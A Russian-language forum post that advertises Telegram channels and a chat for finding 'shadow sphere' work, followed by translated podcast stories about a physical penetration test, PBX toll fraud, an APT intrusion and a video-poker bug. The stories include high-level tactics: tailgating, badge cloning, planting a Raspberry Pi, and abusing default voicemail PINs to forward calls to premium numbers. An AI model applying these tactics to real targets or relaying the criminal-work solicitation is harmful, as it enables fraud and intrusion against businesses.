https://i.imgur.com/O5ovlEr.gif

Приветствуем всех участников и гостей форума !

В данной теме мы предложим вашему вниманию интересные авторские статьи. Наша команда тщательно выбирает и формирует занимательный контент специально для вас!

В этот раз мы расскажем про реальные истории с темной стороны интернета!

Что это такое? Это подкасты о хакерах, взломах, деятельности теневого правительства, хактивизме, киберпреступности и обо всем, что обитает в скрытых частях сети. Это дневники даркнета. Наслаждайтесь.

Еще больше контента можно найти на нашем канале в Телеграме!

(https://t.me/blackmastchannel)➖ Авторские статьи по заработку, мануалы и скрипты по безопасности

Абсолютно каждый день свежие новости про крипту, теневые темы, криминал и NFT

Так же у нас есть чат, где можно найти работу в теневой сфере или подыскать покупателей на свои услуги!

ЖМИ, ЧТОБЫ ВСТУПИТЬ!

https://t.me/BlackMASTChat

Эпизод 1: NOIRNET
Вступить в наш чат


Частный пен-тестер берется за работу вместе с другим эксцентричным пен-тестером. Один стремится вломиться в здание, второй хочет справиться по сети. Что из этого получилось, читай дальше.

Гость: хакер и пен-тестер TinkerSec

Ведущий: Привет, это Джек, ведущий шоу. Уже подошли к концу рождественские праздники. Кто-то из нас отдыхал, но кто-то тщательно следил за безопасностью. Хакеры любят наносить удары, когда люди в отпуске и никто не следит за компанией. Это история от нашего старого друга, TinkerSecure. Он пен-тестер, которому платят за взлом сайтов для проверки их безопасности. Наслаждайтесь.

Тинкер: Это был вечер воскресенья, я сел на рейс в Лос-Анджелес. Мне удалось до краёв заполнить свою ручную кладь отмычками и клонировщиками бейджей. Казалось, охрану аэропорта беспокоит только мой ноутбук. Сделав рентгеновский снимок, они пропустили его, не обращая внимания на хакерские инструменты. Это было за неделю до Рождества, и я должен был быть дома с моими сыновьями, украшающими елку и планирующими, какие печенья они оставят для Санты, то есть для меня. Но вот я сажусь на другой рейс в другое богом забытое место, чтобы проникнуть в другое здание.

В моей голове роились мысли о семье, о потерянной любви, о найденной новой любви. Задание по взлому ещё где-то далеко впереди, а пока я уселся на свое место, налил себе ***** с колой из крошечной бутылочки на одну порцию и попытался немного поспать в этой тесной летающей консервной банке.

Лос-Анджелес не перестает меня удивлять. Независимо от того, как часто я оказываюсь здесь, я всегда поражен огромным размахом разрастания. Люди стояли друг на друге, деревья торчали из бетона. Каждый дюйм горизонта занят. Моим водителем был кореец, подозрительно бодрый в этот поздний час. Он убедился, что мне удобно, а затем мы отправились к месту назначения. Мужчина приобретает определенную долю фатализма, когда в два часа ночи петляет между пробками, двигаясь со скоростью 120 км/ч. Мой водитель улыбнулся и спросил меня, для чего я приехал.

— Бизнес, — ответил я.

— Что вы делаете?

— Я вламываюсь в здания.

— Ну, а какие методы ты используешь для проникновения в здания?

Я честно ответил: "Взлом — это классический метод. Сейчас мы клонируем бейджики, те самые, по которым в здания проходит персонал. Хотя часто, если вы просто улыбаетесь, люди уже открывают вам дверь. "

Мы еще немного поболтали. Через некоторое время он включил классическую музыку и поехал прямо по шоссе. Водитель подвёз меня прямо к моему отелю. Он поспешно вышел из машины, открыл багажник, вытащил мои сумки и поставил их передо мной. Меня заверили, что если я оставлю ему пятизвездочный отзыв, он ответит тем же. Я заверил его, что обязательно поставлю.

Об отеле и говорить нечего. Я положил свои сумки сбоку от кровати, не стал распаковывать. Я жутко переживал. Нервы перед заданием никогда не расслабляются. Я просто принял это, чёрт возьми.

Мой коллега уже был в городе, уже заселился в гостиницу, и уже спал. Мы должны были встретиться через 7 часов, а я и так не спал двадцать часов. Слишком возбужден, чтобы спать спокойно, и уже слишком поздно (или слишком рано?) – чтобы принять снотворное, мне пришлось просто лежать и ждать.

Сон был тяжелым. Звуки Лос-Анджелеса заполнили мою комнату, но утро всё-таки наступило, как и всегда. В вестибюле отеля я проглотил завтрак и кофе и направился обратно в свою комнату, чтобы принять душ и побриться. Мой коллега поздно проснулся. Через некоторое время я услышал стук в дверь. У Ягикса была жуткая комбинация бороды и прически; его вчерашняя небритая борода сливалась с затылком, создавая ровный вид со всех сторон.

Yagix был гуру RFID (радиочастотная идентификация) и беспроводной связи. Это когда у тебя есть дерьмо, которое летает по воздуху, он тут же выхватывает его и швыряет тебе в лицо. Он решил, что сможет получить доступ к сети Wi-Fi жертвы и взломать ее. Если у него получится, мне не нужно будет вмешиваться, и мы бы быстро закруглились. Он нашёл высокое общественное здание примерно в 500 метров от нашей цели. Я пошел с ним, и мы примостились в общей зоне рядом с окном, выходящим на смотровую площадку. Вид был захватывающим. У него была сумка с длинной антенной Yagi, которая была подключена к его ноутбуку. Он поставил сумку у окна и повернул ее так, чтобы яги указывала на него. Затем он сдвинул сумку на 2 см влево, посмотрел на экран и пробормотал что-то о каналах. Затем он что-то набрал в своем ноутбуке, сдвинул сумку влево еще на 2 см. Пока Ягикс занимался своим делом, я сидел напротив него и потягивал кофе.

Я просматривал территорию, чтобы убедиться, что никто не обращает на нас внимания. Через некоторое время Ягикс сказал, что цель слишком далеко, и он не может до неё добраться.

— Мне нужно выйти из здания и подойти как можно ближе, — сказал он.

Я кивнул и допил свой кофе. Что ж, если ему нужно отправиться на место, я могу провести настоящую разведку для него. Я вернулся в отель и взял свою сумку для снаряжения. Я ждал в холле своего помощника. Я проверил свою сумку: клонировщик бейджиков имел радиус действия около 15 метров. Отмычки, ноутбук, длинный кусок картона тоже были в сумке. Появился мой коллега.

Мы вышли. Подошел к месту: обычное офисное здание в обычном офисном комплексе. Три этажа, несколько входов: спереди, сзади и сбоку.

Мы сидели на открытой площадке для пикника и смотрели, как люди расходятся на обед. Костюм служащего выглядел повседневным; джинсы, рубашка и легкое пальто по погоде. Я видел несколько бейджиков то здесь, то там, которые все носят по-разному: некоторые на шее, некоторые на ремне. Я вытащил фальшивый белый бейджик и пристегнул его к ремню. Это было похоже на заднюю часть их бэйждика. Я видел, как люди выходили из черного входа. Я взглянул на своего коллегу.

Он быстро заверил меня: "Нет, стой, я смогу взломать. Просто дай мне минутку."

— Не останавливайся, — ответил я. Меня всё равно могут поймать.

Я встал и направился к задней двери. Джентльмен как раз уходил. Я крикнул: "Эй, секундочку" и подбежал, чтобы придержать дверь.

https://telegra.ph/fth-01-21

Эпизод 1: NOIRNET (2) (https://i.imgur.com/DwhXCqK.png)
Вступить в наш чат


Он улыбнулся, придержал дверь и обеспокоенно посмотрел на мой ремень. Увидел мой белый значок и вздохнул с облегчением. Я придержал для него дверь, когда он ушел, и я вошел сюда только для того, чтобы быть встреченным другой дверью с панелью доступа с пин-падом и лестницей неподалёку. Я взглянул вверх и увидел камеру, поэтому выбрал лестницу. Второй этаж был таким же. Третий этаж был таким же. У меня ничего не было. Я спустился вниз, намереваясь уйти и попробовать еще раз. Я не хотел, чтобы камеры застали меня за подозрительным поведением.

Когда я подошел к двери, чтобы выйти, я увидел людей, возвращающихся с раннего обеда. Я остался внутри и вытащил свой телефон, делая вид, что болтаю с кем-то. Три человека: двое мужчин и одна женщина вошли в здание. Я сказал немного громко в свой телефон: "Извините, мне нужно возвращаться. Я позвоню вам позже." Я пошел за небольшой толпой, когда они подошли к двери с пин-падом.

Главный джентльмен вошел и придержал дверь для женщины. Женщина придержала дверь для своей подруги, а ее подруга открыла дверь для меня. Я улыбнулся, сказал: "Спасибо" и вошел в защищенную зону моей цели. С этим я справился. Что теперь? Первое, что я сделал, это нашел уборную, умылся и успокоил нервы. Мне нужно было найти конференц-зал, место, куда можно было бы подключить прослушку. Я вышел из туалета и вымыл руки, улыбнувшись человеку рядом со мной. Я вытер руки. Надеюсь, я смогу хотя бы ходить и не выглядеть подозрительно. Далее направился ходить по коридорам. Наемные рабы толпились в кучках открытых офисных полукабин. Разные секции имели разные цвета; Финансы были зелеными, операции — красными, IT — синими.

Я зашел в комнату отдыха и налил себе кофе, завязал разговор с двумя сотрудниками. Мы обсудили способы ухода за волосами, когда они повыпадывают в старости. Одна из моих собеседниц сокрушалась о том времени, когда она была беременна, и у нее были роскошные густые волосы. Я вышел из комнаты отдыха со своим кофе и заметил нечто, похожее на большой конференц-зал. Стекло от пола до потолка, аквариум. Все отвернулись от меня, глядя на дисплеи на стене. На табличке было написано "Центр управления безопасностью". Это был их операционный центр безопасности. Я уставился на затылки Синей команды. На моем лице появилась озорная ухмылка. На их дисплеях отображались процессы безопасности. Я видел один для антивируса, один для брандмауэра, один для систем обнаружения вторжений и так далее.

Теперь я знал, с чем мне нужно бороться. Люди, которые могли остановить меня, и инструменты, которые я должен был обойти.

Я попытался стереть ухмылку с лица и пошел дальше. Я подошел к скоплению никому не нужных компьютеров, ожидающих использования. Я подошел к джентльмену, сидящему в одиночестве. Он взглянул на меня и снял наушники. — Извините, что беспокою вас, Вы не возражаете, если я останусь здесь? Мне нужно очень быстро подготовиться к презентации на конференции, — спросил я.

— Конечно, садись, — сказал он и указал на пустой стол.

Я вытащил свой ноутбук и вытащил за ним устройство меньшего размера. Raspberry Pi (микрокомпьютер) был размером с кредитную карту, но содержал полный арсенал хакерских инструментов. Притворившись, что подключаю свой ноутбук, вместо этого я положил R-Pi под стол и подключил его.

На своем ноутбуке я подтвердил подключение к моему Raspberry Pi и провел небольшое начальное сканирование, чтобы понять, в какой подсети находится мое устройство. Я отключил свой ноутбук. Теперь все махинации я смогу делать дистанционно из своего отеля через этот Raspberry Pi. На выходе я увидел кабинет начальника отдела информационной безопасности. Я подошел к двери. Я колебался: "Нужно ли мне?" Дверь открылась. Я замер. Директор по информационным технологиям вышел и прошел мимо меня, задев мою сумку. Я извинился, отвернулся и опустил голову, пошел дальше по коридору и вышел из офисного здания. Я закрыл дверь за собой, дёрнул ещё раз — заблокировано.

Я помахал своей сумкой возле устройства для считывания бейджей у двери и услышал, как она щелкнула. С этого момента я могу вернуться в свой отель и взламывать все, что мне нужно. У меня был удаленный вход, но если нужно, я всегда мог вернуться сюда, всегда войти, всегда быть директором по информационной безопасности.

Кстати, о моём товарище. Ягикс получил учетные данные домена из их корпоративной беспроводной сети WPA2 с помощью Eaphammer. Он тоже был внутри. Похоже, мне не нужно было вламываться в их офис.

Я вызвал такси. На этот раз водитель молчал: оставил мне время подумать.

Все компьютерные защиты: брандмауэры, замки, бейджи — все это не имело значения, когда простая улыбка открыла дверь. Но мне нравятся улыбки, праздничное настроение, рождественская пора. Если подумать, я с нетерпением жду возможности купить своим сыновьям новый рождественский подарок.

https://telegra.ph/EHpizod-1-NOIRNET-01-21

Эпизод 2: КАК ПРЕВРАТИТЬ ЧУЖОЙ ТЕЛЕФОН В БАНКОМАТ?
Вступить в наш чат
Незадолго до рассвета февральским утром в тихом жилом районе Карачи, города в Пакистане... Глава разведывательного управления Пакистана Мир Мазхар Джаббар направляется к дому хакера, за которым он следит уже более двух лет. За Джаббаром стоит группа пакистанских полицейских. Джаббар подходит к входной двери и стучит.

Вы, наверное, уже знаете, что у ФБР есть список 10 самых разыскиваемых преступников, но вы, возможно, не знаете, что ФБР также составляет список самых разыскиваемых киберпреступников. Джаббар и его команда собираются совершить налет на дом одного из самых разыскиваемых киберпреступников.

АДАМ: Хакеры сделали все за один выходной, когда никого не было в офисе.

ВЕДУЩИЙ: Это Адам Финч, жертва одной из таких хакерских атак.

АДАМ: Мы даже не знали об этом, пока месяц спустя не получили счет за телефон. Он был на 24 000 долларов больше, чем обычно.

— Почему он был таким высоким?

— В счете говорилось, что мы звонили на несколько номеров с оплатой за минуту.

— Вроде секса по телефону и всяких глупых телемагазинов?

—Точно. Мы попытались опровергнуть обвинения в телефонной компании, но им было плевать. Мы обратились в полицию, но в итоге нам не помогли.

ВЕДУЩИЙ: Адам не хотел, чтобы я раскрывал, в какой компании он работал, потому что это дурная слава для компании. Однако компания Адама оплатила расходы, потому что другого выхода не было. Вы можете удивиться, зачем кому-то вламываться в офис и выставлять за кого-то огромный телефонный счет. Но вот суть взлома: хакеры набирали с телефона компании принадлежащие им номера с поминутной оплатой. С помощью этой атаки они буквально превращают чужие телефоны в банкоматы.

Хакер звонит на стационарный телефон в случайно выбранном офисе. Но сейчас 19:00 и пятница, поэтому никто не берет трубку. Звонок переходит на голосовую почту, но некоторые телефоны имеют возможность удаленно проверять голосовую почту.

ГОЛОСОВАЯ ПОЧТА: Чтобы получить доступ к голосовой почте, введите свой пин-код, а затем нажмите клавишу решетки.

ВЕДУЩИЙ: Хакер сначала попробует последние четыре цифры телефонного номера. Обычно это PIN-код по умолчанию для ящика голосовой почты. Как только они попадают в голосовую почту, они ищут определенный вариант конфигурации.

ГОЛОСОВАЯ ПОЧТА: Чтобы активировать режим «Не беспокоить», нажмите 1. Чтобы изменить постоянный номер для переадресации, нажмите 2.

ВЕДУЩИЙ: Бинго. Переадресация вызова. Хакер устанавливает номер для переадресации звонков на номер своей линии с поминутной оплатой. Теперь, когда в следующий раз кто-нибудь наберет номер телефона, он будет звонить на линию с поминутной оплатой.

Почему жертва не может обратиться в телефонную компанию, чтобы возместить расходы?

ПОЛ: Потому что телефонная компания не покрывает последствия и убытки. Меня зовут Пол Бирн, я работаю в компании UC Defense, которую я основал для снижения угрозы мошенничества с платными телефонными звонками или иначе широко известного как взлом АТС (Автоматическая телефонная станция).

ВЕДУЩИЙ: Пол защищает компании от хакеров АТС с 2012 года. Он говорит, что телефонные компании имеют законное право взимать любые сборы, которые начисляются их клиентам. Обычно это прописывается в договоре.

— Да, жертва, как правило, оказывается виновной.

— Но самое главное, АТС не является собственностью телекома. Он принадлежит потерпевшему. Причиной этого нападения стала собственная халатность жертвы к безопасности. Точно так же, как когда интернет-провайдер предоставляет компании подключение к Интернету, он не несет ответственности в случае взлома этой компании. Сколько ежегодно обходится людям взлом АТС?

— Лучшее доказательство предоставлено Ассоциацией по борьбе с мошенничеством в коммуникациях. По их оценкам, взлом АТС обходится деловому сообществу более чем в десять миллиардов долларов в год. Это число удвоилось за последние 4 года.

— Проблема в том, что компании не предпринимают шаги для правильной защиты своих АТС. Часто в компаниях нет никого, кто мог бы настроить АТС, поэтому они передают эту работу подрядчику. Но они часто выбирают самого дешевого подрядчика, чтобы сэкономить деньги, что приводит к небезопасной или наспех настроенной АТС. Надлежащая защита АТС — непростая задача. Поскольку для приема входящих вызовов АТС должна быть в сети, вы не можете просто заблокировать весь входящий доступ к ней. Еще больше усложняет ситуацию то, что в некоторых офисах есть мобильные сотрудники, у которых дома есть стационарный телефон. Это тонкий баланс между дозволенным и запрещенным. Каков средний счет для жертвы?

— Например, есть компания, в телефонной системе которой в среднем сотня пользователей: их взломали в пятницу вечером. В понедельник утром их телефонный счет составит около 60 000 евро.

— Полиция может помочь жертвам этого преступления?

— Нет, потому что полиция не знает об этом. Они привыкли к другим типам преступлений — кражи, взломы, разбой. Но когда происходит этот инцидент с АТС, у них нет ресурсов даже для того, чтобы понять, что это за преступление и как они будут его расследовать.

ВЕДУЩИЙ: Как сказал Пол, полиция просто не приспособлена для борьбы с такими преступлениями. Звонки почти всегда идут в зарубежные страны, такие как Восточный Тимор, Куба, Латвия и даже Зимбабве. О многих из этих преступлений не сообщается. Компании боятся плохой огласки, если сообщат, что их взломали. Иногда жертвы обращаются в ФБР, но ФБР обычно интересуют только угрозы правительству или стране или преступления, ущерб от которых превышает один миллион долларов. Большая часть этого взлома АТС исчисляется десятками тысяч.

ФБР ценит, когда люди сообщают о преступлении, поскольку это помогает им собирать данные для того, чтобы завести дело. В 2012 году ФБР получило достаточно сообщений о взломе АТС, чтобы начать анализ данных. Каким-то образом им удалось отследить, кто звонил по этим телефонам. При просмотре данных начали появляться закономерности, которые в конечном итоге привели их к двум мужчинам: Фархан Аршад и Нур Азиз Уддин.

ФБР выяснило, что двое мужчин летели в Куала-Лумпур в Малайзии. Через несколько часов после того, как два хакера прибыли в Куала-Лумпур, Интерпол провел обыск в их отеле и арестовал их обоих. Однако после 60-дневного заключения генеральный прокурор Малайзии отпустил их обоих на свободу.

Согласно официальному отчету, генеральный прокурор Малайзии заявил: «Ордер на арест, полученный Министерством внутренних дел Малайзии, нарушил технические детали, связанные с требованиями Закона об экстрадиции 1992 года». Малайзия посчитала, что эти двое мужчин незаконно арестованы. Фархан и Уддин немедленно покинули Малайзию и вернулись в Пакистан. Уже в следующем месяце ФБР предъявило обвинение обоим мужчинам, добавило их в список самых разыскиваемых в киберпространстве и предложило вознаграждение в размере 50 000 долларов за любую информацию, которая приведет к аресту одного из них. Их список жертв превышает 60 компаний, вот самые крупные:

Компания в Карлштадте, штат Нью-Джерси, утверждает, что они потеряли 78 000 долларов.

Компания в Энглвуде, штат Нью-Джерси, утверждает, что потеряла 83 000 долларов.

Но самым высоким в списке является городок Парсиппани-Трой-Хиллз в Нью-Джерси. Они утверждают, что эти хакеры выставили телефонный счет на 395 000 долларов.
Согласно обвинительному заключению, хакеры в течение тринадцати миллионов минут набирали номер с 4800 различных взломанных телефонных номеров. Как только ФБР получило ордер на их арест, оно уведомило об этом Пакистан, где, по их мнению, жили эти двое мужчин. В Пакистане FIA начала его исследование. FIA — Федеральное агентство расследований, аналогичное ЦРУ в США. Начальником службы безопасности FIA является Мир Мазхар Джаббар, и в течение многих лет у FIA не было никаких зацепок, чтобы поймать этих мужчин. Затем FIA получила наводку. Кто-то утверждал, что знает номер мобильного телефона Уддина. FIA работала с телефонной компанией, чтобы отследить GPS-координаты этого мобильного телефона. Именно тогда Джаббар совершил налёт на дом Уддина. Он не только поймал Уддина, но и Аршада, который тоже был в доме.

Ирония судьбы, вы не находите? Этих двух телефонных хакеров поймали, потому что стал известен их номер телефона. ФБР утверждает, что они нанесли ущерб в пятьдесят миллионов долларов. Что Уддин сделал с деньгами? Он купил около пятидесяти участков земли вокруг Карачи, своего родного города в Пакистане, и даже инвестировал около 400 000 долларов в различные местные предприятия. Эти двое мужчин были арестованы за взлом АТС, но есть тысячи других хакеров АТС, которых так и не поймали. Хотя мы не знаем, кто они и где они, мы знаем одно наверняка: взлом АТС будет продолжаться до тех пор, пока безопасность не улучшится.

https://telegra.ph/EHpizod-2-KAK-PRE...BANKOMAT-02-04

Эпизод 3: Хакерский взлом — это бизнес
Вступить в наш чат
Что происходит, когда инновационная технологическая компания, пытающаяся разработать следующую великую вещь в истории, обнаруживает хакера в своей сети? Об этом расскажет следователь цифровой криминалистики. Финал вас удивит.
Эндрю работает в компании по оценке безопасности и цифровой криминалистики. Другие крупные корпорации нанимают его команду для обеспечения безопасности. Сегодня он хочет поделиться с нами интересной историей о том, как однажды столкнулся с хакерами в компании, занимающейся разработкой передовых технологий.

ЭНДРЮ: Мой клиент — международная технологическая фирма. Я не буду говорить название компании, но именно эта компания они тратят много времени и денег на разработку новых технологий. У них есть полноценный отдел исследований и разработок с передовыми технологиями. Фактически, они разрабатывают технологии, которые не разрабатывает ни одна другая компания, поэтому одним из их самых ценных активов является интеллектуальная собственность. Компания хочет убедиться, что хакеры не крадут эту информацию.

ВЕДУЩИЙ: Иногда компании нанимают группу безопасности, чтобы проверить сеть на присутствие хакеров в сети.

ЭНДРЮ: Они хотели, чтобы мы изучили их сеть. Мы просто ознакомились с ситуацией и использовали информацию, которую мы уже накопили в команде во время предыдущих атак.

ВЕДУЩИЙ: Группа начинает изучать журналы и сеть, а также различные устройства безопасности и сетевую активность.

ЭНДРЮ: Оценка безопасности включала использование разведывательных данных. Так мы обнаружили хакерскую активность в их сети. Это были APT-хакеры.

ВЕДУЩИЙ: Эндрю упомянул APT-хакеров. Это худший тип хакера, которого можно найти в вашей сети. APT означает Advanced Persistent Threat. Это группа высококвалифицированных хакеров, у которых есть конкретная цель. Но более того, у них часто есть значительные ресурсы, например, спонсируемые государством или просто хорошо финансируемые.

ЭНДРЮ: Мы выяснили, что они спонсируется государством. Это где-то на востоке, я думаю. Известно, что сама группа проникает и в другие технологические компании.

ВЕДУЩИЙ: Быть атакованным APT означает, что вы столкнулись с очень опытным и серьезным злоумышленником, который, скорее всего, так просто не уйдет. Обнаружить APT в сети крайне сложно. Такую ситуацию можно изучать несколько лет, чтобы понять какое вредоносное ПО используется хакерами. Затем, если мы обнаружим определенное вредоносное ПО в сети, мы сможем связать его с этим конкретным APT, но проблема в том, что после публикации отчета другие люди также получат доступ к этим методам. Группа APT может изменить свою тактику, чтобы стать более скрытной. В этом случае вредоносное ПО, обнаруженное в сети, совпадало с тем же вредоносным ПО, которое кто-то опубликовал в отчете, который связывал его с конкретной группой APT.

ЭНДРЮ: Мы потратили на исследования несколько месяцев.

ВЕДУЩИЙ: Почему нельзя было просто удалить вредоносное ПО?

ЭНДРЮ: Хороший вопрос. Нас часто спрашивают, почему мы сразу не исправим ситуацию. Клиентская среда — это международная компания. У них много офисов и достаточно сложная инфраструктура. Мы хотели получить более точную картину. Когда мы приступили к исправлению, мы не удаляли часть инфраструктуры хакеров только для того, чтобы была возможность засечь их в другом месте. Иная проблема заключается в том, что они знают, что мы следим за ними. Как только вы вмешаетесь, они узнают, что вы их преследуете и изменят свою тактику. Это сделает вас слепым.

ВЕДУЩИЙ: Команда Эндрю потратила несколько месяцев на изучение этой хакерской группы и того, что они делают. То, что было обнаружено, подтверждает худшие опасения компании.

ЭНДРЮ: Они искали системы НИОКР (Научно-исследовательские и опытно-конструкторские работы). Они хотели украсть, и они действительно украли некоторую интеллектуальную собственность.

ВЕДУЩИЙ: Эта хакерская группа не только успешно взломала сеть, но и успешно украла новейшие передовые технологии компании. Для такой передовой технологической компании кража интеллектуальной собственности является огромной проблемой, которая может иметь последствия для компании на миллионы долларов.

ЭНДРЮ: Не могу назвать точную сумму, но было много беспокойства просто потому, что они работали над технологией "убийцы" следующего поколения. Я думаю, если бы она попала в руки конкурента или в руки любой другой компании, очевидно, повлияла бы на производительность их компании довольно значительно.

ВЕДУЩИЙ: Компания была в ужасе и хотела немедленно удалить вредоносное ПО, но команде безопасности все еще нужно было понять угрозу и изучить ее подробнее. Они не были готовы его удалить.

ЭНДРЮ: Мы провели много исследований в разных областях. Как я уже сказал, мы создали стратегию решения проблемы. Я стал работать над этим ещё в 2015 году, и самые ранние доказательства, которые мы нашли, были в 2010 году. Это не было отправной точкой, это был всего лишь самый ранний признак активности, который мы смогли найти. У нас были доказательства того, что акт угрозы существовал по крайней мере 5 лет. Я помню, как сидел в зале заседаний с клиентом в их офисе. Мы сообщили им, что атака уже была в 2010 году. Это поразило их, ведь в течение минимум пяти лет кто-то имел доступ к их системам.

ВЕДУЩИЙ: Как клиент воспринял такую новость?

ЭНДРЮ: Это был неоднозначный ответ; некоторые люди разозлились и хотели знать, почему мы не исправили ситуацию немедленно. Были и другие, кто волновался за компанию: "Как ваши успехи? Что уже известно? Что мы делаем дальше?"

Затем, очевидно, был страх, потому что, как я уже сказал, это технологическая фирма: у них есть свои исследования и разработки, и они хотят быть лучшими на рынке. Это был смешанный комок эмоций и это понятно. В конце концов, мы — незнакомцы, сидящие в комнате и говорящие им, что они уже давно принадлежат хакерам, но мы еще не в состоянии что-то исправить, потому что не готовы. Это сложная тема для обсуждения с любым клиентом.

ВЕДУЩИЙ: Тем временем вы продолжили изучать APT, чтобы собрать еще больше данных.

ЭНДРЮ: Мы все еще наблюдали хакерскую активность во время исследований, на этапе мониторинга и на этапе обнаружения. Было довольно интересно, потому что они были часто активны. Мы могли видеть горизонтальное движение, мы могли видеть, как они делали вход в систему, чтобы убедиться, что их вирусы все еще находятся в системе. Они могли следить за коммуникациями и обновлять свои инструменты. Интересно наблюдать, как они это делают. Эти ребята проверяли, чтобы их вредоносное ПО все еще работало, и развертывали новые версии.

ВЕДУЩИЙ: Прошло несколько месяцев, команда криминалистов чувствует себя достаточно уверенно. Они собрали достаточно информации, чтобы удалить APT из сети раз и навсегда. Они обнаружили потенциальные пути проникновения хакеров, какие входы в систему они использовал, куда шли и что делали. Пришло время всё исправить и, наконец, выгнать эту хакерскую группу из сети, но внезапно активность APT прекратилась...

ЭНДРЮ: В течение нескольких недель действия хакеров были аккуратными, очень аккуратными. Мы не видели никакого движения. Они либо уже украли то, ради чего пришли, либо что-то еще.

ВЕДУЩИЙ: Эндрю и его команда готовы удалить вредоносное ПО из сети, но вдруг они увидели новость: их клиента пыталась выкупить компания, из страны, где предположительно находились те самые хакеры.

ЭНДРЮ: Как я уже сказал, за последние пару недель угроза затихла, а затем ни с того ни с сего возникла эта попытка выкупа. Это было за феноменальную сумму денег. Это стало неожиданностью для всех.

Мы продолжили постепенно удаление ПО, но хакеры так и не проявили активности. Это было очень странно.

ВЕДУЩИЙ: Итак, компания приняла предложение о выкупе?

ЭНДРЮ: Да, хакерам удалось купить компанию. История заставляет задуматься. Хакерский взлом похож на бизнес. Я никогда не работал над заданием, в котором было бы какое-либо повреждение или удаление файлов. Хотя воровство само по себе злонамеренно, кроме воровства я ничего не видел. Я никогда не видел кибервандализма, хактивизма или чего-то в этом роде. Всегда были попытки кражи и интеллектуальной собственности. Я думаю, это бизнес. Я думаю, что в реальном мире, в мире бизнеса, описанном выше, люди воруют идеи каждый день. Я просто думаю, что это другая его форма. Я думаю, что компаниям нужно по-другому смотреть на эти группы. Пытаться понять, кто их спонсоры. Все дело в деньгах.









https://telegra.ph/EHpizod-3-Hakersk...o-biznes-02-15

Эпизод 4: Страх и ненависть в Лас-Вегасе
Вступить в наш чат


Мечтали ли вы выиграть казино? Герои нашего подкаста со своей задачей справились. К чему это привело читайте дальше.

ВЕДУЩИЙ: Эх, Вегас. Родина казино так и манит всех, мечтающий разбогатеть. Но дело в том, что казино всегда выигрывает. Машины и игры построены таким образом, что в конечном итоге игрок проиграет. Почти каждая ставка, которую вы можете сделать в Вегасе, сыграет в пользу казино. Однако миллионы людей играют, ища способы обмануть систему. Но что, если бы вы нашли способ изменить шансы в свою пользу и можете выигрывать когда захотите?

Однажды я работал в Лас-Вегасе, штат Невада. Меня всегда удивляло, какие способы используют люди, чтобы выиграть в казино. Я видел, как люди кладут счастливую монетку на свой игровой автомат или размахивают специальным пером в воздухе при каждом броске костей. Я видел, как люди считали карты и записывали все свои результаты. Каждый из них ищет способ взять преимущество, разработать долгосрочную выигрышную стратегию. Некоторые люди относятся к этому очень серьезно.

Большинство серьезных хакеров игровых автоматов покупают автомат и пытаются взломать ее дома. Они играют, добавляя в машину различные предметы, чтобы попытаться вывести ее из строя и выплюнуть деньги. На сегодняшний день существует множество устройств для взлома игровых автоматов. Один из них называется «Обезьянья лапа», и это устройство с небольшим светом, которое вы втыкаете в монетоприемник автомата. Это заставляет машину думать, что, когда произошла выплата, монеты не выпали. Тогда автомат снова выплачивает выигрыш. Вор может украсть все монеты из игрового автомата всего за несколько минут. Если мошенника поймают с использованием таких устройств почти сразу же можно попасть в тюрьму. Наказания суровые и строгие, и это большой риск для воров.

Джон Кейн — пианист-виртуоз. Сорок из своих пятидесяти лет он является опытным пианистом, играет для большой аудитории, обучает игре на фортепиано, продает свои записи. Он живет в Лас-Вегасе и руководит консалтинговой фирмой по вопросам управления, которая утверждает, что ее клиентами являются тридцать компаний из списка Fortune 100. К 2005 году бизнес Джона стал очень прибыльным. Он жил в большом доме на северо-востоке Вегаса. Но помимо любви к игре на фортепиано и сборке моделей поездов, он также любил азартные игры. Это продолжалось годами, но к 2006 году он сильно пристрастился.

В том же году он проиграл 500 000 долларов в азартных играх, часто в казино Boulder Station. Его любимой игрой был видеопокер. Видеопокер — простая, но увлекательная игра. Вам дается пять карт с возможностью скинуть любую из этих карт, чтобы получить новую. Цель состоит в том, чтобы получить лучший набор карт на руке. Выиграть можно где угодно: от одного цента, который вы положили в автомат, до тысяч долларов в джекпоте. Джон провел много времени, играя в видеопокер под названием Game King, созданный IGT. Это был самый популярный видео-слот в Вегасе. Он содержал такие игры, как Deuces Wild, Jacks Are Better, Triple Play и Bonus Poker. Его пианистские руки стильно и элегантно украшали кнопки автомата, и он часами играл в покер в тысячи партий. Но однажды случилось что-то странное.

В апреле 2009 года он играл в видеопокерный автомат Game King в казино Фримонт в центре Лас-Вегаса. Он пытался изменить свою ставку и нажал несколько неправильных кнопок. Внезапно автомат показал, что он выиграл более 1000 долларов, даже не сделав ставки. Он сразу понял, что это ошибка автомата. Его выплата была настолько большой, что сотруднику казино пришлось доставать ее вручную. Он сказал дежурному, что, по его мнению, произошла ошибка, но дежурный просто подумал, что он шутит, и все равно отдал выплату. Джон попытался повторить проблему. Он провел еще несколько часов, играя и пытаясь повторить это странное событие. Джон позвонил другу. Несколькими годами ранее у Джона был друг по азартным играм по имени Андре Нестор.

Андре был на тринадцать лет моложе Джона и работал телефонным оператором в банке. Он зарабатывал значительно меньше, чем Джон, но все же умудрялся проигрывать около 20 000 долларов в год, играя в азартные игры. Джон позвонил Андре и рассказал ему об ошибке, которую он обнаружил в автомате для видеопокера, и что, по его мнению, он сможет воспроизвести ее. Андре сразу же заинтересовался.

Джон встретил Андре в аэропорту Маккаран, они позавтракал и сразу же вернулись в Фримонт и сели бок о бок за два видеопокерных автомата Game King. У Джона были некоторые идеи о том, как вызвать ошибку, но он не знал наверняка. Он объяснил Андре, что, по его мнению, было схемой, и они вдвоем приступили к поиску ошибки. Они пробовали разные стратегии ставок, разные игры, комбинации нажатия кнопок и разные уровни ставок. Время от времени им удавалось вызвать ошибку.

После нескольких часов игры бок о бок они выяснили точную последовательность действий, которую необходимо выполнить, чтобы получить очень большой выигрыш. В тот вечер они сорвали многочисленные джекпоты и отправились на праздничный ужин. Они начали обдумывать свои планы. К счастью для них, автомат для видеопокера Game King очень популярен в Вегасе. Не только в казино, но и в закусочных, и на заправочных станциях, и почти везде. Они знали, что их действия могут попасть под подозрение. Они спланировали, как будут действовать дальше.

